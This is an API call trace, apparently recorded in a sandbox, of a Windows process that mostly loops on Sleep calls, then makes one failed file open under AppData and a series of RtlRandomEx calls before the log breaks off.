[0185.263] Sleep (dwMilliseconds=0x258) [0185.285] Sleep (dwMilliseconds=0x258) [0185.300] Sleep (dwMilliseconds=0x258) [0185.315] Sleep (dwMilliseconds=0x258) [0185.331] Sleep (dwMilliseconds=0x258) [0185.394] Sleep (dwMilliseconds=0x258) [0185.440] Sleep (dwMilliseconds=0x258) [0185.458] Sleep (dwMilliseconds=0x258) [0185.471] Sleep (dwMilliseconds=0x258) [0185.487] Sleep (dwMilliseconds=0x258) [0185.504] Sleep (dwMilliseconds=0x258) [0185.518] Sleep (dwMilliseconds=0x258) [0185.534] Sleep (dwMilliseconds=0x258) [0185.613] Sleep (dwMilliseconds=0x258) [0185.659] Sleep (dwMilliseconds=0x258) [0185.694] Sleep (dwMilliseconds=0x258) [0185.705] Sleep (dwMilliseconds=0x258) [0185.723] Sleep (dwMilliseconds=0x258) [0185.736] Sleep (dwMilliseconds=0x258) [0185.752] Sleep (dwMilliseconds=0x258) [0185.768] Sleep (dwMilliseconds=0x258) [0185.830] Sleep (dwMilliseconds=0x258) [0185.877] Sleep (dwMilliseconds=0x258) [0185.906] Sleep (dwMilliseconds=0x258) [0185.908] Sleep (dwMilliseconds=0x258) [0185.924] Sleep (dwMilliseconds=0x258) [0185.941] Sleep (dwMilliseconds=0x258) [0185.955] Sleep (dwMilliseconds=0x258) [0185.973] Sleep (dwMilliseconds=0x258) [0185.987] Sleep (dwMilliseconds=0x258) [0186.049] Sleep (dwMilliseconds=0x258) [0186.096] Sleep (dwMilliseconds=0x258) [0186.137] Sleep (dwMilliseconds=0x258) [0186.142] Sleep (dwMilliseconds=0x258) [0186.163] Sleep (dwMilliseconds=0x258) [0186.173] Sleep (dwMilliseconds=0x258) [0186.189] Sleep (dwMilliseconds=0x258) [0186.205] Sleep (dwMilliseconds=0x258) [0186.268] Sleep (dwMilliseconds=0x258) [0186.314] Sleep (dwMilliseconds=0x258) [0186.345] Sleep (dwMilliseconds=0x258) [0186.360] Sleep (dwMilliseconds=0x258) [0186.378] Sleep (dwMilliseconds=0x258) [0186.392] Sleep (dwMilliseconds=0x258) [0186.408] Sleep (dwMilliseconds=0x258) [0186.423] Sleep (dwMilliseconds=0x258) [0186.487] Sleep (dwMilliseconds=0x258) [0186.532] Sleep (dwMilliseconds=0x258) [0186.557] Sleep (dwMilliseconds=0x258) [0186.578] Sleep (dwMilliseconds=0x258) [0186.587] Sleep (dwMilliseconds=0x258) [0186.596] Sleep (dwMilliseconds=0x258) [0186.610] Sleep (dwMilliseconds=0x258) [0186.626] Sleep (dwMilliseconds=0x258) [0186.689] Sleep (dwMilliseconds=0x258) [0186.736] Sleep (dwMilliseconds=0x258) [0186.794] Sleep (dwMilliseconds=0x258) [0186.815] Sleep (dwMilliseconds=0x258) [0186.828] Sleep (dwMilliseconds=0x258) [0186.845] Sleep (dwMilliseconds=0x258) [0186.860] Sleep (dwMilliseconds=0x258) [0186.923] Sleep (dwMilliseconds=0x258) [0186.969] Sleep (dwMilliseconds=0x258) [0186.989] Sleep (dwMilliseconds=0x258) [0187.000] Sleep (dwMilliseconds=0x258) [0187.017] Sleep (dwMilliseconds=0x258) [0187.031] Sleep (dwMilliseconds=0x258) [0187.056] Sleep (dwMilliseconds=0x258) [0187.062] Sleep (dwMilliseconds=0x258) [0187.125] Sleep (dwMilliseconds=0x258) [0187.171] Sleep (dwMilliseconds=0x258) [0187.189] Sleep (dwMilliseconds=0x258) [0187.207] Sleep (dwMilliseconds=0x258) [0187.227] Sleep (dwMilliseconds=0x258) [0187.234] Sleep (dwMilliseconds=0x258) [0187.250] Sleep (dwMilliseconds=0x258) [0187.265] Sleep (dwMilliseconds=0x258) [0187.329] Sleep (dwMilliseconds=0x258) [0187.375] Sleep (dwMilliseconds=0x258) [0187.400] Sleep (dwMilliseconds=0x258) [0187.406] Sleep (dwMilliseconds=0x258) [0187.422] Sleep (dwMilliseconds=0x258) [0187.437] Sleep (dwMilliseconds=0x258) [0187.452] Sleep (dwMilliseconds=0x258) [0187.469] Sleep (dwMilliseconds=0x258) [0187.484] Sleep (dwMilliseconds=0x258) [0187.547] Sleep (dwMilliseconds=0x258) [0187.657] Sleep (dwMilliseconds=0x258) [0187.700] Sleep (dwMilliseconds=0x258) [0187.702] Sleep (dwMilliseconds=0x258) [0187.718] Sleep (dwMilliseconds=0x258) [0187.733] Sleep (dwMilliseconds=0x258) [0187.749] Sleep (dwMilliseconds=0x258) [0187.766] Sleep (dwMilliseconds=0x258) [0187.827] Sleep (dwMilliseconds=0x258) [0187.874] Sleep (dwMilliseconds=0x258) [0187.894] Sleep (dwMilliseconds=0x258) [0187.905] Sleep (dwMilliseconds=0x258) [0187.920] Sleep (dwMilliseconds=0x258) [0187.936] Sleep (dwMilliseconds=0x258) [0187.952] Sleep (dwMilliseconds=0x258) [0187.967] Sleep (dwMilliseconds=0x258) [0188.029] Sleep (dwMilliseconds=0x258) [0188.076] Sleep (dwMilliseconds=0x258) [0188.109] Sleep (dwMilliseconds=0x258) [0188.123] Sleep (dwMilliseconds=0x258) [0188.139] Sleep (dwMilliseconds=0x258) [0188.155] Sleep (dwMilliseconds=0x258) [0188.170] Sleep (dwMilliseconds=0x258) [0188.186] Sleep (dwMilliseconds=0x258) [0188.248] Sleep (dwMilliseconds=0x258) [0188.312] Sleep (dwMilliseconds=0x258) [0188.346] Sleep (dwMilliseconds=0x258) [0188.357] Sleep (dwMilliseconds=0x258) [0188.373] Sleep (dwMilliseconds=0x258) [0188.389] Sleep (dwMilliseconds=0x258) [0188.404] Sleep (dwMilliseconds=0x258) [0188.424] Sleep (dwMilliseconds=0x258) [0188.482] Sleep (dwMilliseconds=0x258) [0188.530] Sleep (dwMilliseconds=0x258) [0188.584] Sleep (dwMilliseconds=0x258) [0188.591] Sleep (dwMilliseconds=0x258) [0188.609] Sleep (dwMilliseconds=0x258) [0188.622] Sleep (dwMilliseconds=0x258) [0188.639] Sleep (dwMilliseconds=0x258) [0188.700] Sleep (dwMilliseconds=0x258) [0188.751] Sleep (dwMilliseconds=0x258) [0188.779] Sleep (dwMilliseconds=0x258) [0188.794] Sleep (dwMilliseconds=0x258) [0188.811] Sleep (dwMilliseconds=0x258) [0188.825] Sleep (dwMilliseconds=0x258) [0188.841] Sleep (dwMilliseconds=0x258) [0188.858] Sleep (dwMilliseconds=0x258) [0188.919] Sleep (dwMilliseconds=0x258) [0188.967] Sleep (dwMilliseconds=0x258) [0188.994] Sleep (dwMilliseconds=0x258) [0188.997] Sleep (dwMilliseconds=0x258) [0189.012] Sleep (dwMilliseconds=0x258) [0189.028] Sleep (dwMilliseconds=0x258) [0189.047] Sleep (dwMilliseconds=0x258) [0189.059] Sleep (dwMilliseconds=0x258) [0189.076] Sleep (dwMilliseconds=0x258) [0189.137] Sleep (dwMilliseconds=0x258) [0189.185] Sleep (dwMilliseconds=0x258) [0189.213] Sleep (dwMilliseconds=0x258) [0189.216] Sleep (dwMilliseconds=0x258) [0189.231] Sleep (dwMilliseconds=0x258) [0189.247] Sleep (dwMilliseconds=0x258) [0189.262] Sleep (dwMilliseconds=0x258) [0189.280] Sleep (dwMilliseconds=0x258) [0189.294] Sleep (dwMilliseconds=0x258) [0189.356] Sleep (dwMilliseconds=0x258) [0189.404] Sleep (dwMilliseconds=0x258) [0189.442] Sleep (dwMilliseconds=0x258) [0189.449] Sleep (dwMilliseconds=0x258) [0189.465] Sleep (dwMilliseconds=0x258) [0189.480] Sleep (dwMilliseconds=0x258) [0189.496] Sleep (dwMilliseconds=0x258) [0189.514] Sleep (dwMilliseconds=0x258) [0189.590] Sleep (dwMilliseconds=0x258) [0189.637] Sleep (dwMilliseconds=0x258) [0189.656] Sleep (dwMilliseconds=0x258) [0189.668] Sleep (dwMilliseconds=0x258) [0189.683] Sleep (dwMilliseconds=0x258) [0189.699] Sleep (dwMilliseconds=0x258) [0189.715] Sleep (dwMilliseconds=0x258) [0189.730] Sleep (dwMilliseconds=0x258) [0189.793] Sleep (dwMilliseconds=0x258) [0189.839] Sleep (dwMilliseconds=0x258) [0189.863] Sleep (dwMilliseconds=0x258) [0189.871] Sleep (dwMilliseconds=0x258) [0189.886] Sleep (dwMilliseconds=0x258) [0189.902] Sleep (dwMilliseconds=0x258) [0189.922] Sleep (dwMilliseconds=0x258) [0189.933] Sleep (dwMilliseconds=0x258) [0189.949] Sleep (dwMilliseconds=0x258) [0190.011] Sleep (dwMilliseconds=0x258) [0190.060] Sleep (dwMilliseconds=0x258) [0190.073] Sleep (dwMilliseconds=0x258) [0190.089] Sleep (dwMilliseconds=0x258) [0190.104] Sleep (dwMilliseconds=0x258) [0190.120] Sleep (dwMilliseconds=0x258) [0190.136] Sleep (dwMilliseconds=0x258) [0190.151] Sleep (dwMilliseconds=0x258) [0190.215] Sleep (dwMilliseconds=0x258) [0190.262] Sleep (dwMilliseconds=0x258) [0190.280] Sleep (dwMilliseconds=0x258) [0190.292] Sleep (dwMilliseconds=0x258) [0190.307] Sleep (dwMilliseconds=0x258) [0190.325] Sleep (dwMilliseconds=0x258) [0190.339] Sleep (dwMilliseconds=0x258) [0190.354] Sleep (dwMilliseconds=0x258) [0190.417] Sleep (dwMilliseconds=0x258) [0190.469] Sleep (dwMilliseconds=0x258) [0190.519] Sleep (dwMilliseconds=0x258) [0190.526] Sleep (dwMilliseconds=0x258) [0190.542] Sleep (dwMilliseconds=0x258) [0190.557] Sleep (dwMilliseconds=0x258) [0190.600] Sleep (dwMilliseconds=0x258) [0190.635] Sleep (dwMilliseconds=0x258) [0190.682] Sleep (dwMilliseconds=0x258) [0190.732] Sleep (dwMilliseconds=0x258) [0190.744] Sleep (dwMilliseconds=0x258) [0190.759] Sleep (dwMilliseconds=0x258) [0190.775] Sleep (dwMilliseconds=0x258) [0190.791] Sleep (dwMilliseconds=0x258) [0190.806] Sleep (dwMilliseconds=0x258) [0190.869] Sleep (dwMilliseconds=0x258) [0190.916] Sleep (dwMilliseconds=0x258) [0190.961] Sleep (dwMilliseconds=0x258) [0190.962] Sleep (dwMilliseconds=0x258) [0190.978] Sleep (dwMilliseconds=0x258) [0190.993] Sleep (dwMilliseconds=0x258) [0191.009] Sleep (dwMilliseconds=0x258) [0191.025] Sleep (dwMilliseconds=0x258) [0191.087] Sleep (dwMilliseconds=0x258) [0191.134] Sleep (dwMilliseconds=0x258) [0191.168] Sleep (dwMilliseconds=0x258) [0191.181] Sleep (dwMilliseconds=0x258) [0191.200] Sleep (dwMilliseconds=0x258) [0191.212] Sleep (dwMilliseconds=0x258) [0191.228] Sleep (dwMilliseconds=0x258) [0191.243] Sleep (dwMilliseconds=0x258) [0191.305] Sleep (dwMilliseconds=0x258) [0191.353] Sleep (dwMilliseconds=0x258) [0191.392] Sleep (dwMilliseconds=0x258) [0191.399] Sleep (dwMilliseconds=0x258) [0191.415] Sleep (dwMilliseconds=0x258) [0191.430] Sleep (dwMilliseconds=0x258) [0191.446] Sleep (dwMilliseconds=0x258) [0191.462] Sleep (dwMilliseconds=0x258) [0191.524] Sleep (dwMilliseconds=0x258) [0191.585] Sleep (dwMilliseconds=0x258) [0191.609] Sleep (dwMilliseconds=0x258) [0191.619] Sleep (dwMilliseconds=0x258) [0191.633] Sleep (dwMilliseconds=0x258) [0191.649] Sleep (dwMilliseconds=0x258) [0191.664] Sleep (dwMilliseconds=0x258) [0191.680] Sleep (dwMilliseconds=0x258) [0191.742] Sleep (dwMilliseconds=0x258) [0191.789] Sleep (dwMilliseconds=0x258) [0191.807] Sleep (dwMilliseconds=0x258) [0191.820] Sleep (dwMilliseconds=0x258) [0191.836] Sleep (dwMilliseconds=0x258) [0191.852] Sleep (dwMilliseconds=0x258) [0191.867] Sleep (dwMilliseconds=0x258) [0191.883] Sleep (dwMilliseconds=0x258) [0191.945] Sleep (dwMilliseconds=0x258) [0191.992] Sleep (dwMilliseconds=0x258) [0192.014] Sleep (dwMilliseconds=0x258) [0192.023] Sleep (dwMilliseconds=0x258) [0192.042] Sleep (dwMilliseconds=0x258) [0192.055] Sleep (dwMilliseconds=0x258) [0192.070] Sleep (dwMilliseconds=0x258) [0192.086] Sleep (dwMilliseconds=0x258) [0192.103] Sleep (dwMilliseconds=0x258) [0192.164] Sleep (dwMilliseconds=0x258) [0192.210] Sleep (dwMilliseconds=0x258) [0192.232] Sleep (dwMilliseconds=0x258) [0192.242] Sleep (dwMilliseconds=0x258) [0192.257] Sleep (dwMilliseconds=0x258) [0192.273] Sleep (dwMilliseconds=0x258) [0192.289] Sleep (dwMilliseconds=0x258) [0192.304] Sleep (dwMilliseconds=0x258) [0192.366] Sleep (dwMilliseconds=0x258) [0192.413] Sleep (dwMilliseconds=0x258) [0192.438] Sleep (dwMilliseconds=0x258) [0192.444] Sleep (dwMilliseconds=0x258) [0192.460] Sleep (dwMilliseconds=0x258) [0192.476] Sleep (dwMilliseconds=0x258) [0192.491] Sleep (dwMilliseconds=0x258) [0192.507] Sleep (dwMilliseconds=0x258) [0192.584] Sleep (dwMilliseconds=0x258) [0192.616] Sleep (dwMilliseconds=0x258) [0192.643] Sleep (dwMilliseconds=0x258) [0192.647] Sleep (dwMilliseconds=0x258) [0192.663] Sleep (dwMilliseconds=0x258) [0192.679] Sleep (dwMilliseconds=0x258) [0192.695] Sleep (dwMilliseconds=0x258) [0192.710] Sleep (dwMilliseconds=0x258) [0192.772] Sleep (dwMilliseconds=0x258) [0192.819] Sleep (dwMilliseconds=0x258) [0192.842] Sleep (dwMilliseconds=0x258) [0192.850] Sleep (dwMilliseconds=0x258) [0192.866] Sleep (dwMilliseconds=0x258) [0192.881] Sleep (dwMilliseconds=0x258) [0192.909] Sleep (dwMilliseconds=0x258) [0192.912] Sleep (dwMilliseconds=0x258) [0192.928] Sleep (dwMilliseconds=0x258) [0192.975] Sleep (dwMilliseconds=0x258) [0193.022] Sleep (dwMilliseconds=0x258) [0193.060] Sleep (dwMilliseconds=0x258) [0193.072] Sleep (dwMilliseconds=0x258) [0193.084] Sleep (dwMilliseconds=0x258) [0193.100] Sleep (dwMilliseconds=0x258) [0193.115] Sleep (dwMilliseconds=0x258) [0193.132] Sleep (dwMilliseconds=0x258) [0193.193] Sleep (dwMilliseconds=0x258) [0193.241] Sleep (dwMilliseconds=0x258) [0193.281] Sleep (dwMilliseconds=0x258) [0193.287] Sleep (dwMilliseconds=0x258) [0193.303] Sleep (dwMilliseconds=0x258) [0193.318] Sleep (dwMilliseconds=0x258) [0193.334] Sleep (dwMilliseconds=0x258) [0193.351] Sleep (dwMilliseconds=0x258) [0193.412] Sleep (dwMilliseconds=0x258) [0193.459] Sleep (dwMilliseconds=0x258) [0193.493] Sleep (dwMilliseconds=0x258) [0193.505] Sleep (dwMilliseconds=0x258) [0193.523] Sleep (dwMilliseconds=0x258) [0193.537] Sleep (dwMilliseconds=0x258) [0193.552] Sleep (dwMilliseconds=0x258) [0193.630] Sleep (dwMilliseconds=0x258) [0193.678] Sleep (dwMilliseconds=0x258) [0193.702] Sleep (dwMilliseconds=0x258) [0193.708] Sleep (dwMilliseconds=0x258) [0193.724] Sleep (dwMilliseconds=0x258) [0193.739] Sleep (dwMilliseconds=0x258) [0193.755] Sleep (dwMilliseconds=0x258) [0193.770] Sleep (dwMilliseconds=0x258) [0193.833] Sleep (dwMilliseconds=0x258) [0193.880] Sleep (dwMilliseconds=0x258) [0193.895] Sleep (dwMilliseconds=0x258) [0193.923] Sleep (dwMilliseconds=0x258) [0193.926] Sleep (dwMilliseconds=0x258) [0193.942] Sleep (dwMilliseconds=0x258) [0193.958] Sleep (dwMilliseconds=0x258) [0193.973] Sleep (dwMilliseconds=0x258) [0194.036] Sleep (dwMilliseconds=0x258) [0194.095] Sleep (dwMilliseconds=0x258) [0194.131] Sleep (dwMilliseconds=0x258) [0194.145] Sleep (dwMilliseconds=0x258) [0194.160] Sleep (dwMilliseconds=0x258) [0194.177] Sleep (dwMilliseconds=0x258) [0194.194] Sleep (dwMilliseconds=0x258) [0194.207] Sleep (dwMilliseconds=0x258) [0194.270] Sleep (dwMilliseconds=0x258) [0194.317] Sleep (dwMilliseconds=0x258) [0194.345] Sleep (dwMilliseconds=0x258) [0194.348] Sleep (dwMilliseconds=0x258) [0194.363] Sleep (dwMilliseconds=0x258) [0194.379] Sleep (dwMilliseconds=0x258) [0194.394] Sleep (dwMilliseconds=0x258) [0194.410] Sleep (dwMilliseconds=0x258) [0194.426] Sleep (dwMilliseconds=0x258) [0194.488] Sleep (dwMilliseconds=0x258) [0194.536] Sleep (dwMilliseconds=0x258) [0194.573] Sleep (dwMilliseconds=0x258) [0194.605] Sleep (dwMilliseconds=0x258) [0194.613] Sleep (dwMilliseconds=0x258) [0194.628] Sleep (dwMilliseconds=0x258) [0194.645] Sleep (dwMilliseconds=0x258) [0194.706] Sleep (dwMilliseconds=0x258) [0194.757] Sleep (dwMilliseconds=0x258) [0194.790] Sleep (dwMilliseconds=0x258) [0194.800] Sleep (dwMilliseconds=0x258) [0194.816] Sleep (dwMilliseconds=0x258) [0194.831] Sleep (dwMilliseconds=0x258) [0194.847] Sleep (dwMilliseconds=0x258) [0194.863] Sleep (dwMilliseconds=0x258) [0194.925] Sleep (dwMilliseconds=0x258) [0194.985] Sleep (dwMilliseconds=0x258) [0195.028] Sleep (dwMilliseconds=0x258) [0195.034] Sleep (dwMilliseconds=0x258) [0195.050] Sleep (dwMilliseconds=0x258) [0195.066] Sleep (dwMilliseconds=0x258) [0195.082] Sleep (dwMilliseconds=0x258) [0195.097] Sleep (dwMilliseconds=0x258) [0195.159] Sleep (dwMilliseconds=0x258) [0195.238] Sleep (dwMilliseconds=0x258) [0195.306] Sleep (dwMilliseconds=0x258) [0195.315] Sleep (dwMilliseconds=0x258) [0195.330] Sleep (dwMilliseconds=0x258) [0195.346] Sleep (dwMilliseconds=0x258) [0195.361] Sleep (dwMilliseconds=0x258) [0195.410] Sleep (dwMilliseconds=0x258) [0195.455] Sleep (dwMilliseconds=0x258) [0195.502] Sleep (dwMilliseconds=0x258) [0195.531] Sleep (dwMilliseconds=0x258) [0195.533] Sleep (dwMilliseconds=0x258) [0195.549] Sleep (dwMilliseconds=0x258) [0195.564] Sleep (dwMilliseconds=0x258) [0195.599] Sleep (dwMilliseconds=0x258) [0195.612] Sleep (dwMilliseconds=0x258) [0195.674] Sleep (dwMilliseconds=0x258) [0195.707] Sleep (dwMilliseconds=0x258) [0195.738] Sleep (dwMilliseconds=0x258) [0195.752] Sleep (dwMilliseconds=0x258) [0195.768] Sleep (dwMilliseconds=0x258) [0195.783] Sleep (dwMilliseconds=0x258) [0195.798] Sleep (dwMilliseconds=0x258) [0195.861] Sleep (dwMilliseconds=0x258) [0195.908] Sleep (dwMilliseconds=0x258) [0195.925] Sleep (dwMilliseconds=0x258) [0195.939] Sleep (dwMilliseconds=0x258) [0195.956] Sleep (dwMilliseconds=0x258) [0195.981] Sleep (dwMilliseconds=0x258) [0195.985] Sleep (dwMilliseconds=0x258) [0196.001] Sleep (dwMilliseconds=0x258) [0196.065] Sleep (dwMilliseconds=0x258) [0196.111] Sleep (dwMilliseconds=0x258) [0196.155] Sleep (dwMilliseconds=0x258) [0196.157] Sleep (dwMilliseconds=0x258) [0196.174] Sleep (dwMilliseconds=0x258) [0196.188] Sleep (dwMilliseconds=0x258) [0196.204] Sleep (dwMilliseconds=0x258) [0196.224] Sleep (dwMilliseconds=0x258) [0196.283] Sleep (dwMilliseconds=0x258) [0196.329] Sleep (dwMilliseconds=0x258) [0196.363] Sleep (dwMilliseconds=0x258) [0196.376] Sleep (dwMilliseconds=0x258) [0196.392] Sleep (dwMilliseconds=0x258) [0196.407] Sleep (dwMilliseconds=0x258) [0196.423] Sleep (dwMilliseconds=0x258) [0196.469] Sleep (dwMilliseconds=0x258) [0196.516] Sleep (dwMilliseconds=0x258) [0196.546] Sleep (dwMilliseconds=0x258) [0196.547] Sleep (dwMilliseconds=0x258) [0196.563] Sleep (dwMilliseconds=0x258) [0196.595] Sleep (dwMilliseconds=0x258) [0196.610] Sleep (dwMilliseconds=0x258) [0196.626] Sleep (dwMilliseconds=0x258) [0196.687] Sleep (dwMilliseconds=0x258) [0196.753] Sleep (dwMilliseconds=0x258) [0196.765] Sleep (dwMilliseconds=0x258) [0196.782] Sleep (dwMilliseconds=0x258) [0196.797] Sleep (dwMilliseconds=0x258) [0196.812] Sleep (dwMilliseconds=0x258) [0196.829] Sleep (dwMilliseconds=0x258) [0196.890] Sleep (dwMilliseconds=0x258) [0196.938] Sleep (dwMilliseconds=0x258) [0196.957] Sleep (dwMilliseconds=0x258) [0196.968] Sleep (dwMilliseconds=0x258) [0196.994] Sleep (dwMilliseconds=0x258) [0197.000] Sleep (dwMilliseconds=0x258) [0197.015] Sleep (dwMilliseconds=0x258) [0197.031] Sleep (dwMilliseconds=0x258) [0197.093] Sleep (dwMilliseconds=0x258) [0197.153] Sleep (dwMilliseconds=0x258) [0197.159] Sleep (dwMilliseconds=0x258) [0197.172] Sleep (dwMilliseconds=0x258) [0197.187] Sleep (dwMilliseconds=0x258) [0197.203] Sleep (dwMilliseconds=0x258) [0197.218] Sleep (dwMilliseconds=0x258) [0197.234] Sleep (dwMilliseconds=0x258) [0197.296] Sleep (dwMilliseconds=0x258) [0197.343] Sleep (dwMilliseconds=0x258) [0197.359] Sleep (dwMilliseconds=0x258) [0197.374] Sleep (dwMilliseconds=0x258) [0197.391] Sleep (dwMilliseconds=0x258) [0197.405] Sleep (dwMilliseconds=0x258) [0197.421] Sleep (dwMilliseconds=0x258) [0197.437] Sleep (dwMilliseconds=0x258) [0197.499] Sleep (dwMilliseconds=0x258) [0197.546] Sleep (dwMilliseconds=0x258) [0197.565] Sleep (dwMilliseconds=0x258) [0197.600] Sleep (dwMilliseconds=0x258) [0197.608] Sleep (dwMilliseconds=0x258) [0197.624] Sleep (dwMilliseconds=0x258) [0197.639] Sleep (dwMilliseconds=0x258) [0197.702] Sleep (dwMilliseconds=0x258) [0197.748] Sleep (dwMilliseconds=0x258) [0197.771] Sleep (dwMilliseconds=0x258) [0197.779] Sleep (dwMilliseconds=0x258) [0197.795] Sleep (dwMilliseconds=0x258) [0197.812] Sleep (dwMilliseconds=0x258) [0197.826] Sleep (dwMilliseconds=0x258) [0197.842] Sleep (dwMilliseconds=0x258) [0197.904] Sleep (dwMilliseconds=0x258) [0197.952] Sleep (dwMilliseconds=0x258) [0197.967] Sleep (dwMilliseconds=0x258) [0197.982] Sleep (dwMilliseconds=0x258) [0198.007] Sleep (dwMilliseconds=0x258) [0198.014] Sleep (dwMilliseconds=0x258) [0198.029] Sleep (dwMilliseconds=0x258) [0198.045] Sleep (dwMilliseconds=0x258) [0198.107] Sleep (dwMilliseconds=0x258) [0198.155] Sleep (dwMilliseconds=0x258) [0198.194] Sleep (dwMilliseconds=0x258) [0198.201] Sleep (dwMilliseconds=0x258) [0198.217] Sleep (dwMilliseconds=0x258) [0198.233] Sleep (dwMilliseconds=0x258) [0198.248] Sleep (dwMilliseconds=0x258) [0198.264] Sleep (dwMilliseconds=0x258) [0198.325] Sleep (dwMilliseconds=0x258) [0198.377] Sleep (dwMilliseconds=0x258) [0198.417] Sleep (dwMilliseconds=0x258) [0198.419] Sleep (dwMilliseconds=0x258) [0198.435] Sleep (dwMilliseconds=0x258) [0198.450] Sleep (dwMilliseconds=0x258) [0198.466] Sleep (dwMilliseconds=0x258) [0198.482] Sleep (dwMilliseconds=0x258) [0198.544] Sleep (dwMilliseconds=0x258) [0198.607] Sleep (dwMilliseconds=0x258) [0198.641] Sleep (dwMilliseconds=0x258) [0198.654] Sleep (dwMilliseconds=0x258) [0198.669] Sleep (dwMilliseconds=0x258) [0198.684] Sleep (dwMilliseconds=0x258) [0198.700] Sleep (dwMilliseconds=0x258) [0198.717] Sleep (dwMilliseconds=0x258) [0198.778] Sleep (dwMilliseconds=0x258) [0198.826] Sleep (dwMilliseconds=0x258) [0198.857] Sleep (dwMilliseconds=0x258) [0198.872] Sleep (dwMilliseconds=0x258) [0198.887] Sleep (dwMilliseconds=0x258) [0198.903] Sleep (dwMilliseconds=0x258) [0198.919] Sleep (dwMilliseconds=0x258) [0198.935] Sleep (dwMilliseconds=0x258) [0198.996] Sleep (dwMilliseconds=0x258) [0199.044] Sleep (dwMilliseconds=0x258) [0199.064] Sleep (dwMilliseconds=0x258) [0199.074] Sleep (dwMilliseconds=0x258) [0199.090] Sleep (dwMilliseconds=0x258) [0199.106] Sleep (dwMilliseconds=0x258) [0199.121] Sleep (dwMilliseconds=0x258) [0199.137] Sleep (dwMilliseconds=0x258) [0199.199] Sleep (dwMilliseconds=0x258) [0199.246] Sleep (dwMilliseconds=0x258) [0199.270] Sleep (dwMilliseconds=0x258) [0199.278] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x26) returned 0x82f2300 [0199.278] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x49e4d496 [0199.280] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x8a) returned 0x82f2390 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c3296a4 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26a7cfdf [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26114120 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1ac6337e [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2aff0d53 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x52c8946 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66f853f5 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4252472e [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x34a85024 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x11d87c61 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x52cc101d [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc5dc0a1 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4e49b739 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7006ac9d [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x154be8e6 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x610820f2 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e9394d2 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x409bcf20 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x706532bf [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x354cad5e [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x20c7ee93 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x44e1e141 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x54b14e2f [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6194e99c [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6a512c7 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78f547dc [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x42f6f73c [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4de90d2d [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6ce35059 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1eeb611f [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7412c749 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4090ec95 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23fb4914 [0199.280] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5c26fda0 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x48336210 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x8ff16fc [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e3611ca [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4fb1b5b3 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6170d1b3 